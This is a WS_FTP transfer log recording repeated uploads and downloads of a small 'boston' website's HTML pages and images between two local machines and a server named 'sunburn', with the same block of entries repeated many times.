10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:47 B C:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:47 B C:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:47 B C:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:47 B C:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:47 B C:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:47 B C:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:47 B C:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:47 B C:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:47 B C:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:47 B C:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:47 B C:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:47 B C:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
